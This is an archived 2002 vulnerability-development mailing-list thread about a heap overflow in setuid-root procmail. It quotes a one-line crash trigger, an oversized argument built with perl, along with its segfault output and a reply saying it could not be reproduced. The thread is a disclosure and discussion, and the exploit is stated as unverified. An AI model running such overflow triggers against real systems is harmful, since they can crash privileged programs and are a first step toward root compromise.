Vulnerability Development mailing list archives
Re: procmail heap overflow
From: SpaceWalker <spacewalker () altern org>
Date: Wed, 19 Jun 2002 10:03:45 +0200
$ procmail -v
procmail v3.15.1 2001/01/08
$ procmail `perl -e '{print "A"x10240}'`=A
wait indefinitively
Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.
On Wed, 19 Jun 2002 02:38:08 +0200
flatline <flatline () blackhat nl> wrote:
hi,
i found a heap overflow in procmail (up until latest) some time ago.
flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$
at first it seemed to properly drop privs before segging, but not too long
ago i managed to make it crash while it still had euid 0.
segfaults have been seen on red hat/slackware linux and bsd variants.
successful exploitation has not been verified.
/ flatline
greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone
who felt left out.
Current thread:
- procmail heap overflow flatline (Jun 19)
- Re: procmail heap overflow Ryan W. Maple (Jun 19)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 19)
- RE: procmail heap overflow Christopher Meiklejohn (Jun 19)
- Re: procmail heap overflow kam (Jun 19)
- Re: procmail heap overflow SpaceWalker (Jun 19)
- Re: procmail heap overflow KF (Jun 19)
- <Possible follow-ups>
- RE: procmail heap overflow Peter Mueller (Jun 19)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 21)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- RE: procmail heap overflow Wodahs Latigid (Jun 20)
- Re: procmail heap overflow Skot (Jun 20)
- RE: procmail heap overflow Peter Mueller (Jun 20)